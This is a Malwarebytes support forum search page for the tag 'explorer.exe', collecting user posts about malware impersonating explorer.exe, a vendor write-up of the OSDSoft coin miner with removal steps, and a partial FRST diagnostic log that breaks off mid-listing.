Jump to content

Search the Community

Showing results for tags 'explorer.exe'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

  1. Thing I’ve done before the issue is occurred is the only thing I do is to plugged back my USB flash’s drives to my laptop using a PORT USB HUB . so no any changes were made to the system or to anything related to the OS itself (the WINDOWS SYSTEM was reinstalled afresh:) ). and then I had to opens up a few portable software from the USB drive to do a checking for updates and some to fails to check for an updates and they being thrown an access denied errors . so I have to do closing all running applications from the system tray included Malwarebytes and the issue go away right after I have to close MB as well . I haven’t made any screenshots of any errors , And Malwarebytes aren’t displayed any blocking message either . so , not sure which MALWAREBYTES real-time components is the one to caused such issue but hope someone can help with this problem because my Malwarebytes is now not running so I have no anti-malware protection . I also I’ve been noticed that of a notable hanging of the explorer.exe/software slowdown and hard responding of a lot of software that I use even though the any opened folder will goes to be not responding . and WINDOWS 10 says that the ZONEalarm anti-virus have blocking the screen capture and caused to that software which the name of it is "Capturewiz" to be blocked on my windows system even though I’ve never Install any AV on my windows 10 Machine ???? I only Have Windows security ""aka windows defender" and Malwarebytes running alongside to each . http://pixelmetrics.com/Tips/SecurityAps/SecurityApsBlockCapture.htm
  2. Hello Everyone. I'm hacked with multiple hacking ways. A Malware infected to my Laptop with both svchost.exe and explorer.exe infection. I have deleted this for tenth times but its still downloading or creating itself. It was a hack tool for Point Blank (Its a online fps game). I downloaded it from www.sepok-cit.com . This site has too many good reviews and i believed them. Already I Tried a few ways to delte this sh*t from my computer but none of them worked. I TRIED: 1) Deleting its files (hidden files named as spoolsvc.exe , svchost.exe and explorer.exe) 2) Deleting it via regedit (from HKEY_LOCAL_MACHINE's windows and windows NT folders) 3) Killing it with RogueKiller 4) Deleting this with MalwareBytes 5) Deleting it with Kaspersky 6) Deleting it with Avast But none of them worked. I Tried also disabling Windows Update from services.msc . Its deleted in each steps i wrote but its reinstalling (or recreating idk what it does) itself everytime i reboot my laptop and SHOWING IN TASK MANAGER WHEN I LAUNCH POINT BLANK (game that i want to hack). POINT BLANK LAUNCHER is TRIGGER of it. Its origin location is Windows/Resources and Windows/Resources/Windows. PLEASE HELP ME. IM LOSING MY MIND!!!
  3. A few days ago I restarted my computer before a long time without re-starting it (like 1 week with the pc on) and I noticed that "Explorer.exe" was requesting to initialize, but the real explorer.exe task was already running... I said no but then I checked the directory of the file and the system said that the file was on %windir%/resources/themes, well going into folder to check if the file exists I noticed that theres nothing more than aero themes in this folder. So did a scan in the folder using malwarebytes and it recognized svchost.exe malware and explorer.exe, before adding they do quarentine I wanted to check why the files didnt apeared, so I enabled "show hidden folders" in explorer (the real one, from microsoft) and it changed nothing, well, so I tried to open the archive by going with %windir%/resources/themes/explorer.exe in the explorer path, it worked, but I still uncapable of seeing this file... So I started CMD as admin and did " cd " to %windir%/resources/themes and did " dir " inside the folder, as I expected the dir shows the same as explorer, but appeared 2 new items that the was named as " . " and " .. " I deleted both sucessfully. Searching for this in internet I found that there's an other way to hide files in windows, that was adding them to" important system files or protected system files" list, and following the instructions to disable this privilege, I finally could see the archives, well, I added them to the quarentine list and continued using my computer since yesterday that I realized that everytime malwarebytes send two addwares to quarentine (I left the results of scan in the post as "Annoying addware.txt") they come back right after I finish the task... When trying to solve these issues I realized many things... 1- I cant use commands as DISM, sfc /scannow, windows update, windows defender( I will let write happens when i try to use them bellow this part) , net start/stop wuauserv (the wuauserv service doesnt even exists in registry, I didnt checked windows defender one...) 2- there was a folder called QEMU hidden with the "important system files" method, I deleted all content Inside and then deleted the folder after taking out the folder privilegies 3- Theres two "program" files in "Inicialize" section of task manager wich I cant go to proprieties ( I dropped the print down on anexed files named as "Program" unknow files) When I try to use with /checkhealth everything go fine, but when I try to use dism with /restorehealth it stops at 87,5% and gives an error 1060 messages saying " the specified service does not exist as an installed service " ( I left the DISM log file right bellow named as DISM.txt ) When I try to use sfc /scannow it says that cannot fix all issues When i try to use windows update it says that my organizations disable windows updates ( ? ) When I try windows defender it just goes black screen on the window Well, it would be great if someone could help me, I dont really want to re-install windows... I would take a month to setup my pc again Also, I run Windows 10 Pro 64bits, version 1809... dism.log Annoying Adware.txt Rkill.txt FRST.txt Addition.txt
  4. Hi Question about the "protected application list", why is "explorer.exe" not there and would it be safe to add it? Thanks
  5. What is OSDSoft?The Malwarebytes research team has determined that OSDSoft is a crypto currency miner. These miners are designed to earn cryptocurrency by using system resources.This particular one is a so-called XMRig (Monero) miner.How do I know if my computer is affected by OSDSoft?You may see a file called explorer.exe with this icon:How did OSDSoft get on my computer?Miners use different methods for distributing themselves. This particular one was installed by a bundler.How do I remove OSDSoft?Our program Malwarebytes can detect and remove this miner. Please download Malwarebytes to your desktop. Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program. Then click Finish. Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu. If another update of the definitions is available, it will be implemented before the rest of the scanning procedure. When the scan is complete, make sure that all Threats are selected, and click Remove Selected. Restart your computer when prompted to do so. Is there anything else I need to do to get rid of OSDSoft? After the reboot you can remove the OSDSoft entry from your list of installed Programs and Features if it belonged to the Trojan. How would the full version of Malwarebytes help protect me?We hope our application and this guide have helped you eradicate this trojan.As you can see below the full version of Malwarebytes would have protected you against the OSDSoft trojan. It would have warned you before the trojan could install itself, giving you a chance to stop it before it became too late. and we block the domain that hosts the coin-miner(s): Technical details for expertsPossible signs in FRST logs: (www.xmrig.com) C:\Users\{username}\Desktop\explorer.exe C:\Users\{username}\AppData\Local\Temp\explorer.exe Malwarebytes log: Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 10/24/18 Scan Time: 9:10 AM Log File: eec5bf1f-d75b-11e8-a940-00ffdcc6fdfc.json -Software Information- Version: 3.6.1.2711 Components Version: 1.0.463 Update Package Version: 1.0.7497 License: Premium -System Information- OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: {computername}\{username} -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 238151 Threats Detected: 2 Threats Quarantined: 2 Time Elapsed: 2 min, 37 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registry Key: 0 (No malicious items detected) Registry Value: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 2 RiskWare.HeuristicsReservedWordExploit, C:\USERS\{username}\APPDATA\LOCAL\TEMP\EXPLORER.EXE, Quarantined, [5758], [293543],1.0.7497 Trojan.BitCoinMiner, C:\USERS\{username}\DESKTOP\EXPLORER.EXE, Quarantined, [553], [583341],1.0.7497 Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) As mentioned before the full version of Malwarebytes could have protected your computer against this threat.We use different ways of protecting your computer(s): Dynamically Blocks Malware Sites & Servers Malware Execution Prevention Save yourself the hassle and get protected.
  6. explorer.exe found in AppData/Local/Temp explorer.zip mbam_report_2018-02-08.txt
  7. Hi! I recently got a virus that shows about 50 explorer.exe files on my processes section. I had Avira and scanned my computer with it, but no luck. Then I got Malwarebytes, and it detected 6 unwanted programs. I logged on to my profile, but the virus was still there! I then got Kaspersky, and it didn't detect anything. I was wondering if any of you could help me? PLZ!!
  8. I have the paid version of 3 on my desktop. I downloaded trial version for my laptop. The trail cleaned a few PUPs out. On Laptop, while while using Windows Explorer, I get MB popups stating that it blocked outbound to such places as "click.smytratrafficfilter.com", "clicksgear.com", "popcash.cnet" and more similar toilet-sites. Details show it to be from "C:\windows\sysWOW64\explorer.exe" each time. I have manually scanned explorer.exe with MB and Norton, both OK. I removed the HDD from the laptop and attached as slave to desktop (yes I can) and scanned it with paid version of desktop MB. Nothing there. Scanned with Norton as well - OK. Any ideas? o
  9. Hello Malwarebytes folks, I unfortunately have downloaded some russian software and it installed ALOT of things on my computer one of them being explorer.exe high cpu usage What i have noticed till now : explorer and many services cpu usage after i installed the thing also some unnamed services in task manger when i click open location it direct me to explorer.exe. Fake Chromium install in roaming local folders in C drive with alot of python files etc.. Many folders and files are created in roaming and temp folders randomly named and have cpu usage in task manger. (Tried deleting the files but something generates them even if offline. Some of the text on explorer ribbon and tabs is missing. I can follow any procedure provided while being offline on the infected laptop and download anything from android/linux device and copy it to the infected laptop via usb.
  10. Are these duplicate files normal or a virus? I have the latest version of mbam premium and my threat scan results are zero. I also downloaded the Farbar recovery tool to my desktop and ran a scan. I have copied / pasted the content from FRST.txt below. Please advise. I'm thinking it's not normal to see these duplicate files in task manager. I can delete one but when I reboot, they call come back in multiples. Please advise -------------- Farbar's FRST.txt ----- Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-09-2016 Ran by GImagineG (administrator) on WWBFANBSWHTALAM (19-09-2016 22:30:16) Running from C:\Users\GImagineG\Desktop Loaded Profiles: GImagineG (Available Profiles: GImagineG) Platform: Windows 10 Home Version 1607 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe (Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe (Károly Pados) C:\Program Files (x86)\TinyWall\TinyWall.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS10.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSAS10.MSSQLSERVER\OLAP\bin\msmdsrv.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdhost.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe () C:\Windows\System32\igfxTray.exe (Károly Pados) C:\Program Files (x86)\TinyWall\TinyWall.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.) HKLM\...\Run: [TinyWall Controller] => C:\Program Files (x86)\TinyWall\TinyWall.exe [693080 2016-01-04] (Károly Pados) HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-15] (Microsoft Corporation) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe [286992 2016-01-11] (RealNetworks, Inc.) HKLM-x32\...\Run: [RealDownloader] => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [719632 2015-11-04] () HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [455968 2007-08-23] (Hewlett-Packard Company) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-31] (SUPERAntiSpyware) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk [2015-12-11] ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2016-02-21] ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealTimes.lnk [2016-01-11] ShortcutTarget: RealTimes.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpsystray.exe (RealNetworks, Inc.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 108.7.45.5 Tcpip\..\Interfaces\{0f755d79-3aa7-445a-9614-10e3e0e860bf}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{0f755d79-3aa7-445a-9614-10e3e0e860bf}: [DhcpNameServer] 108.7.45.5 Internet Explorer: ================== HKU\S-1-5-21-1554107894-1944105626-794477097-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE03&ocid=UE03DHP BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2015-11-04] (RealDownloader) BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2015-11-04] (RealDownloader) BHO-x32: Microsoft Web Test Recorder 9.0 Helper -> {E31CE47F-C268-41ba-897B-B415E613947D} -> C:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO90.dll [2007-11-08] (Microsoft Corporation) Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default FF DefaultSearchEngine: Bing FF SearchEngineOrder.3: Bing FF SelectedSearchEngine: Bing FF Homepage: hxxps://www.google.com/ FF Keyword.URL: hxxp://www.bing.com/search?FORM=SL5HDF&PC=SL5H&q= FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-08-09] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN) FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-09] () FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation) FF Plugin-x32: @real.com/nppl3260;version=18.1.2.175 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll [2016-01-11] (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprpplugin;version=18.1.2.175 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll [2016-01-11] (RealPlayer) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-01] (Google Inc.) FF SearchPlugin: C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\searchplugins\bing-.xml [2016-03-29] FF Extension: (Bing Search) - C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\Extensions\bingsearch.full@microsoft.com.xpi [2016-03-29] FF Extension: (Firefox Hotfix) - C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-12] Chrome: ======= CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us CHR StartupUrls: Default -> "hxxps://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR Plugin: (Widevine Content Decryption Module) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x64\widevinecdmadapter.dll => No File CHR Plugin: (Shockwave Flash) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\PepperFlash\21.0.0.216\pepflashplayer.dll => No File CHR Profile: C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default [2016-09-19] CHR Extension: (Google Slides) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-10] CHR Extension: (Google Docs) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-10] CHR Extension: (Google Drive) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-10] CHR Extension: (YouTube) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-10] CHR Extension: (Google Search) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-10] CHR Extension: (Google Sheets) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-10] CHR Extension: (Google Docs Offline) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-17] CHR Extension: (Deluminate) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\iebboopaeangfpceklajfohhbpkkfiaa [2016-05-10] CHR Extension: (Chrome Web Store Payments) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-13] CHR Extension: (Gmail) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-10] CHR Extension: (Chrome Media Router) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-19] CHR Extension: (Abstract Blue) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa [2016-09-05] CHR HKU\S-1-5-21-1554107894-1944105626-794477097-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com) R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-03-27] (Broadcom Corporation.) R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [374360 2016-05-27] (Intel Corporation) R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21184 2015-11-20] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 MsDtsServer100; C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe [220088 2012-06-15] (Microsoft Corporation) R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [34840 2008-07-10] (Microsoft Corporation) R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [57967032 2012-06-15] (Microsoft Corporation) R2 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS10.MSSQLSERVER\OLAP\bin\msmdsrv.exe [43774808 2010-09-17] (Microsoft Corporation) S4 msvsmon90; C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe [4737024 2008-07-29] (Microsoft Corporation) S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG) S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [33088 2015-11-04] () S4 RealTimes Desktop Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1095976 2016-01-11] (RealNetworks, Inc.) R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS10.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2094520 2012-06-15] (Microsoft Corporation) S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [439736 2012-06-15] (Microsoft Corporation) S4 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2015-11-19] (Microsoft Corporation) [File not signed] R2 TinyWall; C:\Program Files (x86)\TinyWall\TinyWall.exe [693080 2016-01-04] (Károly Pados) [File not signed] R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation) ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [173312 2015-03-27] (Broadcom Corporation.) R3 KillerEth; C:\Windows\System32\drivers\e22w10x64.sys [124464 2015-04-27] (Qualcomm Atheros, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-09-19] (Malwarebytes) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com) R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com) R3 SensorsSimulatorDriver; C:\Windows\System32\drivers\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation) U3 aspnet_state; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-09-19 22:30 - 2016-09-19 22:30 - 00017610 _____ C:\Users\GImagineG\Desktop\FRST.txt 2016-09-19 22:30 - 2016-09-19 22:30 - 00000000 ____D C:\FRST 2016-09-19 22:15 - 2016-09-19 22:29 - 02400256 _____ (Farbar) C:\Users\GImagineG\Desktop\FRST64.exe 2016-09-19 